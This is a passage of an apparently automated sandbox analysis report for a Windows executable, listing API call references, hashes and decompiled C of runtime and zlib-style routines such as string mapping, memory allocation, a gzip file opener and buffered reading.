                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_amMl.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
                                                                      • String ID:
                                                                      • API String ID: 3809854901-0
                                                                      • Opcode ID: 6e0241b6e147b769e02d4c25b4a62de63cd09900d226416504aadb47099bd534
                                                                      • Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
                                                                      • Opcode Fuzzy Hash: 6e0241b6e147b769e02d4c25b4a62de63cd09900d226416504aadb47099bd534
                                                                      • Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 005C731A
                                                                      • GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,00423620), ref: 005C732C
                                                                      • _malloc.LIBCMT ref: 005C73F1
                                                                      • _malloc.LIBCMT ref: 005C74B3
                                                                      • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 005C74DE
                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 005C7501
                                                                      • __freea.LIBCMT ref: 005C750B
                                                                      • __freea.LIBCMT ref: 005C7514
                                                                      • ___ansicp.LIBCMT ref: 005C7545
                                                                      • ___convertcp.LIBCMT ref: 005C7570
                                                                      • _malloc.LIBCMT ref: 005C75C9
                                                                      • _memset.LIBCMT ref: 005C75EB
                                                                      • ___convertcp.LIBCMT ref: 005C7621
                                                                      • __freea.LIBCMT ref: 005C7636
                                                                      • LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 005C7650
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.366986826.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_5b0000_amMl.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: String__freea_malloc$___convertcp$ByteCharErrorLastMultiWide___ansicp_memset
                                                                      • String ID:
                                                                      • API String ID: 2918745354-0
                                                                      • Opcode ID: 6e0241b6e147b769e02d4c25b4a62de63cd09900d226416504aadb47099bd534
                                                                      • Instruction ID: fb5663650938f28f1877c5980302636634b3ba0ec0522432f5f35b00d8b63732
                                                                      • Opcode Fuzzy Hash: 6e0241b6e147b769e02d4c25b4a62de63cd09900d226416504aadb47099bd534
                                                                      • Instruction Fuzzy Hash: 4BB1757280414EAFDF219FA4CC84EAE7FB5FB48354B24846DFA15A6520E7348D90DFA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00421320,0000000C,005C0977,00000000,00000000,?,00000001,005BC22D,005BB993), ref: 005C084E
                                                                      • __crt_waiting_on_module_handle.LIBCMT ref: 005C0859
                                                                        • Part of subcall function 005BE9D1: Sleep.KERNEL32(000003E8,00000000,?,005C079F,KERNEL32.DLL,?,005C07EB,?,00000001,005BC22D,005BB993), ref: 005BE9DD
                                                                        • Part of subcall function 005BE9D1: GetModuleHandleW.KERNEL32(00000001,?,005C079F,KERNEL32.DLL,?,005C07EB,?,00000001,005BC22D,005BB993), ref: 005BE9E6
                                                                      • __lock.LIBCMT ref: 005C08B4
                                                                      • InterlockedIncrement.KERNEL32(?), ref: 005C08C1
                                                                      • __lock.LIBCMT ref: 005C08D5
                                                                      • ___addlocaleref.LIBCMT ref: 005C08F3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.366986826.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_5b0000_amMl.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: HandleModule__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                                                      • String ID: @.B$KERNEL32.DLL
                                                                      • API String ID: 4021795732-2520587274
                                                                      • Opcode ID: 6494f875005ce20cdce955d8c22516ac3ccd9d7187ee8c814306de8b46833c7d
                                                                      • Instruction ID: 4b54001227b2fb951f00a055caad412006aa39cbddc3904110a7f1fffb2bb380
                                                                      • Opcode Fuzzy Hash: 6494f875005ce20cdce955d8c22516ac3ccd9d7187ee8c814306de8b46833c7d
                                                                      • Instruction Fuzzy Hash: 10117571940701EED720AF75D805BDABFF0BF44310F50852EE459972E2CB74AA458F98
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • _malloc.LIBCMT ref: 005B5A45
                                                                        • Part of subcall function 005BBAB4: __FF_MSGBANNER.LIBCMT ref: 005BBAD7
                                                                        • Part of subcall function 005BBAB4: __NMSG_WRITE.LIBCMT ref: 005BBADE
                                                                      • _malloc.LIBCMT ref: 005B5AA9
                                                                      • _malloc.LIBCMT ref: 005B5B6D
                                                                      • _malloc.LIBCMT ref: 005B5B97
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.366986826.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_5b0000_amMl.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _malloc
                                                                      • String ID: 1.2.3
                                                                      • API String ID: 1579825452-2310465506
                                                                      • Opcode ID: 7bb03aca1fc5991893fbdddb05e44545bf6cb9a06a6e9765b2a21d01904c984c
                                                                      • Instruction ID: 6b534ed5d3aaa3aa5b5e5eb8a29c6f1e1eed4276c3793cc4dfe3bb7879516fd7
                                                                      • Opcode Fuzzy Hash: 7bb03aca1fc5991893fbdddb05e44545bf6cb9a06a6e9765b2a21d01904c984c
                                                                      • Instruction Fuzzy Hash: 8961D3B1948B818FD7349F2988817AAFFE0FB95310F544D2EE1D683600E775B84ACB52
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 83%
                                                                      			E004057B0(intOrPtr* __eax) {
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				void* __ebp;
                                                                      				intOrPtr* _t57;
                                                                      				char* _t60;
                                                                      				char _t62;
                                                                      				intOrPtr _t63;
                                                                      				char _t64;
                                                                      				intOrPtr _t65;
                                                                      				intOrPtr _t66;
                                                                      				intOrPtr _t67;
                                                                      				intOrPtr _t69;
                                                                      				intOrPtr _t70;
                                                                      				intOrPtr _t74;
                                                                      				intOrPtr _t79;
                                                                      				intOrPtr _t82;
                                                                      				intOrPtr* _t83;
                                                                      				void* _t86;
                                                                      				char* _t88;
                                                                      				char* _t89;
                                                                      				intOrPtr* _t91;
                                                                      				intOrPtr* _t93;
                                                                      				signed int _t97;
                                                                      				signed int _t98;
                                                                      				void* _t100;
                                                                      				void* _t101;
                                                                      				void* _t102;
                                                                      				void* _t103;
                                                                      				void* _t104;
                                                                      
                                                                      				_t98 = _t97 | 0xffffffff;
                                                                      				 *((intOrPtr*)(_t100 + 0xc)) = 0;
                                                                      				_t91 = __eax;
                                                                      				 *((intOrPtr*)(_t100 + 0x10)) = _t100 + 0x10;
                                                                      				if( *((intOrPtr*)(_t100 + 0x68)) == 0 || __eax == 0) {
                                                                      					__eflags = 0;
                                                                      					return 0;
                                                                      				} else {
                                                                      					_t93 = E0040B84D(0, _t86, __eax, 0x74);
                                                                      					_t101 = _t100 + 4;
                                                                      					if(_t93 == 0) {
                                                                      						L31:
                                                                      						return 0;
                                                                      					} else {
                                                                      						 *((intOrPtr*)(_t93 + 0x20)) = 0;
                                                                      						 *((intOrPtr*)(_t93 + 0x24)) = 0;
                                                                      						 *((intOrPtr*)(_t93 + 0x28)) = 0;
                                                                      						 *((intOrPtr*)(_t93 + 0x44)) = 0;
                                                                      						 *_t93 = 0;
                                                                      						 *((intOrPtr*)(_t93 + 0x48)) = 0;
                                                                      						 *((intOrPtr*)(_t93 + 0xc)) = 0;
                                                                      						 *((intOrPtr*)(_t93 + 0x10)) = 0;
                                                                      						 *((intOrPtr*)(_t93 + 4)) = 0;
                                                                      						 *((intOrPtr*)(_t93 + 0x40)) = 0;
                                                                      						 *((intOrPtr*)(_t93 + 0x38)) = 0;
                                                                      						 *((intOrPtr*)(_t93 + 0x3c)) = 0;
                                                                      						 *((intOrPtr*)(_t93 + 0x64)) = 0;
                                                                      						 *((intOrPtr*)(_t93 + 0x68)) = 0;
                                                                      						 *(_t93 + 0x6c) = _t98;
                                                                      						 *((intOrPtr*)(_t93 + 0x4c)) = E00403080(0, 0, 0);
                                                                      						_t57 =  *((intOrPtr*)(_t101 + 0x78));
                                                                      						_t102 = _t101 + 0xc;
                                                                      						 *((intOrPtr*)(_t93 + 0x50)) = 0;
                                                                      						 *((intOrPtr*)(_t93 + 0x58)) = 0;
                                                                      						_t87 = _t57 + 1;
                                                                      						do {
                                                                      							_t82 =  *_t57;
                                                                      							_t57 = _t57 + 1;
                                                                      						} while (_t82 != 0);
                                                                      						_t60 = E0040B84D(0, _t87, _t91, _t57 - _t87 + 1);
                                                                      						_t103 = _t102 + 4;
                                                                      						 *((intOrPtr*)(_t93 + 0x54)) = _t60;
                                                                      						if(_t60 == 0) {
                                                                      							L30:
                                                                      							E00405160(0, _t87, _t93);
                                                                      							goto L31;
                                                                      						} else {
                                                                      							_t83 =  *((intOrPtr*)(_t103 + 0x6c));
                                                                      							_t88 = _t60;
                                                                      							goto L7;
                                                                      							L9:
                                                                      							L9:
                                                                      							if( *_t91 == 0x72) {
                                                                      								 *((char*)(_t93 + 0x5c)) = 0x72;
                                                                      							}
                                                                      							_t63 =  *_t91;
                                                                      							if(_t63 == 0x77 || _t63 == 0x61) {
                                                                      								 *((char*)(_t93 + 0x5c)) = 0x77;
                                                                      							}
                                                                      							_t64 =  *_t91;
                                                                      							if(_t64 < 0x30 || _t64 > 0x39) {
                                                                      								__eflags = _t64 - 0x66;
                                                                      								if(_t64 != 0x66) {
                                                                      									__eflags = _t64 - 0x68;
                                                                      									if(_t64 != 0x68) {
                                                                      										__eflags = _t64 - 0x52;
                                                                      										if(_t64 != 0x52) {
                                                                      											_t89 =  *((intOrPtr*)(_t103 + 0x14));
                                                                      											 *_t89 = _t64;
                                                                      											_t87 = _t89 + 1;
                                                                      											__eflags = _t87;
                                                                      											 *((intOrPtr*)(_t103 + 0x14)) = _t87;
                                                                      										} else {
                                                                      											 *((intOrPtr*)(_t103 + 0x10)) = 3;
                                                                      										}
                                                                      									} else {
                                                                      										 *((intOrPtr*)(_t103 + 0x10)) = 2;
                                                                      									}
                                                                      								} else {
                                                                      									 *((intOrPtr*)(_t103 + 0x10)) = 1;
                                                                      								}
                                                                      							} else {
                                                                      								_t98 = _t64 - 0x30;
                                                                      							}
                                                                      							_t91 = _t91 + 1;
                                                                      							if(_t64 == 0) {
                                                                      								goto L26;
                                                                      							}
                                                                      							_t87 = _t103 + 0x68;
                                                                      							if( *((intOrPtr*)(_t103 + 0x14)) != _t103 + 0x68) {
                                                                      								goto L9;
                                                                      							}
                                                                      							L26:
                                                                      							_t65 =  *((intOrPtr*)(_t93 + 0x5c));
                                                                      							if(_t65 == 0) {
                                                                      								goto L30;
                                                                      							} else {
                                                                      								if(_t65 != 0x77) {
                                                                      									_t66 = E0040B84D(0, _t87, _t91, 0x4000);
                                                                      									 *((intOrPtr*)(_t93 + 0x44)) = _t66;
                                                                      									 *_t93 = _t66;
                                                                      									_t67 = E004071A0(_t93, 0xfffffff1, "1.2.3", 0x38);
                                                                      									_t104 = _t103 + 0x14;
                                                                      									__eflags = _t67;
                                                                      									if(_t67 != 0) {
                                                                      										goto L30;
                                                                      									} else {
                                                                      										__eflags =  *((intOrPtr*)(_t93 + 0x44));
                                                                      										if(__eflags == 0) {
                                                                      											goto L30;
                                                                      										} else {
                                                                      											goto L34;
                                                                      										}
                                                                      									}
                                                                      								} else {
                                                                      									_push(0x38);
                                                                      									_push("1.2.3");
                                                                      									_push( *((intOrPtr*)(_t103 + 0x10)));
                                                                      									_push(8);
                                                                      									_push(0xfffffff1);
                                                                      									_push(8);
                                                                      									_push(_t98);
                                                                      									_push(_t93);
                                                                      									_t91 = E00404CE0();
                                                                      									_t79 = E0040B84D(0, _t87, _t91, 0x4000);
                                                                      									_t104 = _t103 + 0x24;
                                                                      									 *((intOrPtr*)(_t93 + 0x48)) = _t79;
                                                                      									 *((intOrPtr*)(_t93 + 0xc)) = _t79;
                                                                      									if(_t91 != 0 || _t79 == 0) {
                                                                      										goto L30;
                                                                      									} else {
                                                                      										L34:
                                                                      										 *((intOrPtr*)(_t93 + 0x10)) = 0x4000;
                                                                      										 *((intOrPtr*)(E0040BFC1(__eflags))) = 0;
                                                                      										_t69 =  *((intOrPtr*)(_t104 + 0x70));
                                                                      										__eflags = _t69;
                                                                      										_push(_t104 + 0x18);
                                                                      										if(__eflags >= 0) {
                                                                      											_push(_t69);
                                                                      											_t70 = E0040C953(0, _t87, _t91, _t93, __eflags);
                                                                      										} else {
                                                                      											_t87 =  *((intOrPtr*)(_t104 + 0x70));
                                                                      											_push( *((intOrPtr*)(_t104 + 0x70)));
                                                                      											_t70 = E0040CB9D();
                                                                      										}
                                                                      										 *((intOrPtr*)(_t93 + 0x40)) = _t70;
                                                                      										__eflags = _t70;
                                                                      										if(_t70 == 0) {
                                                                      											goto L30;
                                                                      										} else {
                                                                      											__eflags =  *((char*)(_t93 + 0x5c)) - 0x77;
                                                                      											if( *((char*)(_t93 + 0x5c)) != 0x77) {
                                                                      												E00405000(_t93, 0);
                                                                      												_push( *((intOrPtr*)(_t93 + 0x40)));
                                                                      												_t74 = E0040C8E5(0,  *((intOrPtr*)(_t93 + 0x40)), _t91, _t93, __eflags) -  *((intOrPtr*)(_t93 + 4));
                                                                      												__eflags = _t74;
                                                                      												 *((intOrPtr*)(_t93 + 0x60)) = _t74;
                                                                      												return _t93;
                                                                      											} else {
                                                                      												 *((intOrPtr*)(_t93 + 0x60)) = 0xa;
                                                                      												return _t93;
                                                                      											}
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      							goto L42;
                                                                      							L7:
                                                                      							_t62 =  *_t83;
                                                                      							 *_t88 = _t62;
                                                                      							_t83 = _t83 + 1;
                                                                      							_t88 = _t88 + 1;
                                                                      							if(_t62 != 0) {
                                                                      								goto L7;
                                                                      							} else {
                                                                      								 *((char*)(_t93 + 0x5c)) = 0;
                                                                      							}
                                                                      							goto L9;
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      				L42:
                                                                      			}

































                                                                      0x004057b7
                                                                      0x004057bf
                                                                      0x004057c3
                                                                      0x004057c5
                                                                      0x004057cd
                                                                      0x004059c8
                                                                      0x004059ce
                                                                      0x004057db
                                                                      0x004057e3
                                                                      0x004057e5
                                                                      0x004057ea
                                                                      0x00405921
                                                                      0x0040592a
                                                                      0x004057f0
                                                                      0x004057f3
                                                                      0x004057f6
                                                                      0x004057f9
                                                                      0x004057fc
                                                                      0x004057ff
                                                                      0x00405801
                                                                      0x00405804
                                                                      0x00405807
                                                                      0x0040580a
                                                                      0x0040580d
                                                                      0x00405810
                                                                      0x00405813
                                                                      0x00405816
                                                                      0x00405819
                                                                      0x0040581c
                                                                      0x00405824
                                                                      0x00405827
                                                                      0x0040582b
                                                                      0x0040582e
                                                                      0x00405831
                                                                      0x00405834
                                                                      0x00405837
                                                                      0x00405837
                                                                      0x00405839
                                                                      0x0040583a
                                                                      0x00405842
                                                                      0x00405847
                                                                      0x0040584a
                                                                      0x0040584f
                                                                      0x0040591c
                                                                      0x0040591c
                                                                      0x00000000
                                                                      0x00405855
                                                                      0x00405855
                                                                      0x00405859
                                                                      0x0040585b
                                                                      0x00000000
                                                                      0x00405870
                                                                      0x00405872
                                                                      0x00405874
                                                                      0x00405874
                                                                      0x00405877
                                                                      0x0040587b
                                                                      0x00405881
                                                                      0x00405881
                                                                      0x00405885
                                                                      0x00405889
                                                                      0x00405897
                                                                      0x00405899
                                                                      0x004058a5
                                                                      0x004058a7
                                                                      0x004058b3
                                                                      0x004058b5
                                                                      0x004058c1
                                                                      0x004058c5
                                                                      0x004058c7
                                                                      0x004058c7
                                                                      0x004058c8
                                                                      0x004058b7
                                                                      0x004058b7
                                                                      0x004058b7
                                                                      0x004058a9
                                                                      0x004058a9
                                                                      0x004058a9
                                                                      0x0040589b
                                                                      0x0040589b
                                                                      0x0040589b
                                                                      0x0040588f
                                                                      0x00405892
                                                                      0x00405892
                                                                      0x004058cc
                                                                      0x004058cf
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004058d1
                                                                      0x004058d9
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004058db
                                                                      0x004058db
                                                                      0x004058e0
                                                                      0x00000000
                                                                      0x004058e2
                                                                      0x004058e4
                                                                      0x00405930
                                                                      0x0040593f
                                                                      0x00405942
                                                                      0x00405944
                                                                      0x00405949
                                                                      0x0040594c
                                                                      0x0040594e
                                                                      0x00000000
                                                                      0x00405950
                                                                      0x00405950
                                                                      0x00405953
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405953
                                                                      0x004058e6
                                                                      0x004058ea
                                                                      0x004058ec
                                                                      0x004058f1
                                                                      0x004058f2
                                                                      0x004058f4
                                                                      0x004058f6
                                                                      0x004058f8
                                                                      0x004058f9
                                                                      0x00405904
                                                                      0x00405906
                                                                      0x0040590b
                                                                      0x0040590e
                                                                      0x00405911
                                                                      0x00405916
                                                                      0x00000000
                                                                      0x00405955
                                                                      0x00405955
                                                                      0x00405955
                                                                      0x00405961
                                                                      0x00405963
                                                                      0x00405967
                                                                      0x0040596d
                                                                      0x0040596e
                                                                      0x0040597c
                                                                      0x0040597d
                                                                      0x00405970
                                                                      0x00405970
                                                                      0x00405974
                                                                      0x00405975
                                                                      0x00405975
                                                                      0x00405985
                                                                      0x00405988
                                                                      0x0040598a
                                                                      0x00000000
                                                                      0x0040598c
                                                                      0x0040598c
                                                                      0x00405990
                                                                      0x004059a5
                                                                      0x004059ad
                                                                      0x004059b6
                                                                      0x004059b6
                                                                      0x004059b9
                                                                      0x004059c5
                                                                      0x00405992
                                                                      0x00405992
                                                                      0x004059a2
                                                                      0x004059a2
                                                                      0x00405990
                                                                      0x0040598a
                                                                      0x00405916
                                                                      0x004058e4
                                                                      0x00000000
                                                                      0x00405860
                                                                      0x00405860
                                                                      0x00405862
                                                                      0x00405864
                                                                      0x00405865
                                                                      0x00405868
                                                                      0x00000000
                                                                      0x0040586a
                                                                      0x0040586a
                                                                      0x0040586d
                                                                      0x00000000
                                                                      0x00405868
                                                                      0x0040584f
                                                                      0x004057ea
                                                                      0x00000000

                                                                      APIs
                                                                      • _malloc.LIBCMT ref: 004057DE
                                                                        • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                        • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                        • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                      • _malloc.LIBCMT ref: 00405842
                                                                      • _malloc.LIBCMT ref: 00405906
                                                                      • _malloc.LIBCMT ref: 00405930
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.366895867.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.366895867.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.366895867.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_amMl.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _malloc$AllocateHeap
                                                                      • String ID: 1.2.3
                                                                      • API String ID: 680241177-2310465506
                                                                      • Opcode ID: dcd0ffeba55ff02fe10acfaeba0fa9d55be123b2b31187241ea46178cf7d6550
                                                                      • Instruction ID: 6f54ea0e5a0cddcbb7a6eab5c61130b8c10e9e343dc86a4c4a61a5a67c51a18e
                                                                      • Opcode Fuzzy Hash: dcd0ffeba55ff02fe10acfaeba0fa9d55be123b2b31187241ea46178cf7d6550
                                                                      • Instruction Fuzzy Hash: 8B61F7B1944B408FD720AF2A888066BBBE0FB45314F548D3FE5D5A3781D739D8498F5A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.366986826.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_5b0000_amMl.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                      • String ID:
                                                                      • API String ID: 3886058894-0
                                                                      • Opcode ID: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                      • Instruction ID: 82a72810887145bd4ad274a3370a5061d62d10146332d04541f2a3a94254624f
                                                                      • Opcode Fuzzy Hash: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                      • Instruction Fuzzy Hash: 7F51C571900209EFDB209F698C495EEBFB5FF81320F248629F82596191D7B1BE50DF54
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 85%
                                                                      			E0040BCC2(signed int __edx, char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
                                                                      				signed int _v8;
                                                                      				char* _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				void* __ebp;
                                                                      				signed int _t90;
                                                                      				intOrPtr* _t92;
                                                                      				signed int _t94;
                                                                      				char _t97;
                                                                      				signed int _t105;
                                                                      				void* _t106;
                                                                      				signed int _t107;
                                                                      				signed int _t110;
                                                                      				signed int _t113;
                                                                      				intOrPtr* _t114;
                                                                      				signed int _t118;
                                                                      				signed int _t119;
                                                                      				signed int _t120;
                                                                      				char* _t121;
                                                                      				signed int _t125;
                                                                      				signed int _t131;
                                                                      				signed int _t133;
                                                                      				void* _t134;
                                                                      
                                                                      				_t125 = __edx;
                                                                      				_t121 = _a4;
                                                                      				_t119 = _a8;
                                                                      				_t131 = 0;
                                                                      				_v12 = _t121;
                                                                      				_v8 = _t119;
                                                                      				if(_a12 == 0 || _a16 == 0) {
                                                                      					L5:
                                                                      					return 0;
                                                                      				} else {
                                                                      					_t138 = _t121;
                                                                      					if(_t121 != 0) {
                                                                      						_t133 = _a20;
                                                                      						__eflags = _t133;
                                                                      						if(_t133 == 0) {
                                                                      							L9:
                                                                      							__eflags = _t119 - 0xffffffff;
                                                                      							if(_t119 != 0xffffffff) {
                                                                      								_t90 = E0040BA30(_t131, _t121, _t131, _t119);
                                                                      								_t134 = _t134 + 0xc;
                                                                      							}
                                                                      							__eflags = _t133 - _t131;
                                                                      							if(__eflags == 0) {
                                                                      								goto L3;
                                                                      							} else {
                                                                      								_t94 = _t90 | 0xffffffff;
                                                                      								_t125 = _t94 % _a12;
                                                                      								__eflags = _a16 - _t94 / _a12;
                                                                      								if(__eflags > 0) {
                                                                      									goto L3;
                                                                      								}
                                                                      								L13:
                                                                      								_t131 = _a12 * _a16;
                                                                      								__eflags =  *(_t133 + 0xc) & 0x0000010c;
                                                                      								_v20 = _t131;
                                                                      								_t120 = _t131;
                                                                      								if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
                                                                      									_v16 = 0x1000;
                                                                      								} else {
                                                                      									_v16 =  *((intOrPtr*)(_t133 + 0x18));
                                                                      								}
                                                                      								__eflags = _t131;
                                                                      								if(_t131 == 0) {
                                                                      									L40:
                                                                      									return _a16;
                                                                      								} else {
                                                                      									do {
                                                                      										__eflags =  *(_t133 + 0xc) & 0x0000010c;
                                                                      										if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
                                                                      											L24:
                                                                      											__eflags = _t120 - _v16;
                                                                      											if(_t120 < _v16) {
                                                                      												_t97 = E0040FC07(_t120, _t125, _t133);
                                                                      												__eflags = _t97 - 0xffffffff;
                                                                      												if(_t97 == 0xffffffff) {
                                                                      													L48:
                                                                      													return (_t131 - _t120) / _a12;
                                                                      												}
                                                                      												__eflags = _v8;
                                                                      												if(_v8 == 0) {
                                                                      													L44:
                                                                      													__eflags = _a8 - 0xffffffff;
                                                                      													if(__eflags != 0) {
                                                                      														E0040BA30(_t131, _a4, 0, _a8);
                                                                      														_t134 = _t134 + 0xc;
                                                                      													}
                                                                      													 *((intOrPtr*)(E0040BFC1(__eflags))) = 0x22;
                                                                      													_push(0);
                                                                      													_push(0);
                                                                      													_push(0);
                                                                      													_push(0);
                                                                      													_push(0);
                                                                      													L4:
                                                                      													E0040E744(_t125, _t131, _t133);
                                                                      													goto L5;
                                                                      												}
                                                                      												_t123 = _v12;
                                                                      												_v12 = _v12 + 1;
                                                                      												 *_v12 = _t97;
                                                                      												_t120 = _t120 - 1;
                                                                      												_t70 =  &_v8;
                                                                      												 *_t70 = _v8 - 1;
                                                                      												__eflags =  *_t70;
                                                                      												_v16 =  *((intOrPtr*)(_t133 + 0x18));
                                                                      												goto L39;
                                                                      											}
                                                                      											__eflags = _v16;
                                                                      											if(_v16 == 0) {
                                                                      												_t105 = 0x7fffffff;
                                                                      												__eflags = _t120 - 0x7fffffff;
                                                                      												if(_t120 <= 0x7fffffff) {
                                                                      													_t105 = _t120;
                                                                      												}
                                                                      											} else {
                                                                      												__eflags = _t120 - 0x7fffffff;
                                                                      												if(_t120 <= 0x7fffffff) {
                                                                      													_t55 = _t120 % _v16;
                                                                      													__eflags = _t55;
                                                                      													_t125 = _t55;
                                                                      													_t110 = _t120;
                                                                      												} else {
                                                                      													_t125 = 0x7fffffff % _v16;
                                                                      													_t110 = 0x7fffffff;
                                                                      												}
                                                                      												_t105 = _t110 - _t125;
                                                                      											}
                                                                      											__eflags = _t105 - _v8;
                                                                      											if(_t105 > _v8) {
                                                                      												goto L44;
                                                                      											} else {
                                                                      												_push(_t105);
                                                                      												_push(_v12);
                                                                      												_t106 = E0040FA20(_t125, _t131, _t133);
                                                                      												_pop(_t123);
                                                                      												_push(_t106);
                                                                      												_t107 = E004102F4(_t120, _t125, _t131, _t133, __eflags);
                                                                      												_t134 = _t134 + 0xc;
                                                                      												__eflags = _t107;
                                                                      												if(_t107 == 0) {
                                                                      													 *(_t133 + 0xc) =  *(_t133 + 0xc) | 0x00000010;
                                                                      													goto L48;
                                                                      												}
                                                                      												__eflags = _t107 - 0xffffffff;
                                                                      												if(_t107 == 0xffffffff) {
                                                                      													L47:
                                                                      													_t80 = _t133 + 0xc;
                                                                      													 *_t80 =  *(_t133 + 0xc) | 0x00000020;
                                                                      													__eflags =  *_t80;
                                                                      													goto L48;
                                                                      												}
                                                                      												_v12 = _v12 + _t107;
                                                                      												_t120 = _t120 - _t107;
                                                                      												_v8 = _v8 - _t107;
                                                                      												goto L39;
                                                                      											}
                                                                      										}
                                                                      										_t113 =  *(_t133 + 4);
                                                                      										__eflags = _t113;
                                                                      										if(__eflags == 0) {
                                                                      											goto L24;
                                                                      										}
                                                                      										if(__eflags < 0) {
                                                                      											goto L47;
                                                                      										}
                                                                      										_t131 = _t120;
                                                                      										__eflags = _t120 - _t113;
                                                                      										if(_t120 >= _t113) {
                                                                      											_t131 = _t113;
                                                                      										}
                                                                      										__eflags = _t131 - _v8;
                                                                      										if(_t131 > _v8) {
                                                                      											_t133 = 0;
                                                                      											__eflags = _a8 - 0xffffffff;
                                                                      											if(__eflags != 0) {
                                                                      												E0040BA30(_t131, _a4, 0, _a8);
                                                                      												_t134 = _t134 + 0xc;
                                                                      											}
                                                                      											_t114 = E0040BFC1(__eflags);
                                                                      											_push(_t133);
                                                                      											_push(_t133);
                                                                      											_push(_t133);
                                                                      											_push(_t133);
                                                                      											 *_t114 = 0x22;
                                                                      											_push(_t133);
                                                                      											goto L4;
                                                                      										} else {
                                                                      											E004103F1(_t120, _t123, _t125, _v12, _v8,  *_t133, _t131);
                                                                      											 *(_t133 + 4) =  *(_t133 + 4) - _t131;
                                                                      											 *_t133 =  *_t133 + _t131;
                                                                      											_v12 = _v12 + _t131;
                                                                      											_t120 = _t120 - _t131;
                                                                      											_t134 = _t134 + 0x10;
                                                                      											_v8 = _v8 - _t131;
                                                                      											_t131 = _v20;
                                                                      										}
                                                                      										L39:
                                                                      										__eflags = _t120;
                                                                      									} while (_t120 != 0);
                                                                      									goto L40;
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						_t118 = _t90 | 0xffffffff;
                                                                      						_t90 = _t118 / _a12;
                                                                      						_t125 = _t118 % _a12;
                                                                      						__eflags = _a16 - _t90;
                                                                      						if(_a16 <= _t90) {
                                                                      							goto L13;
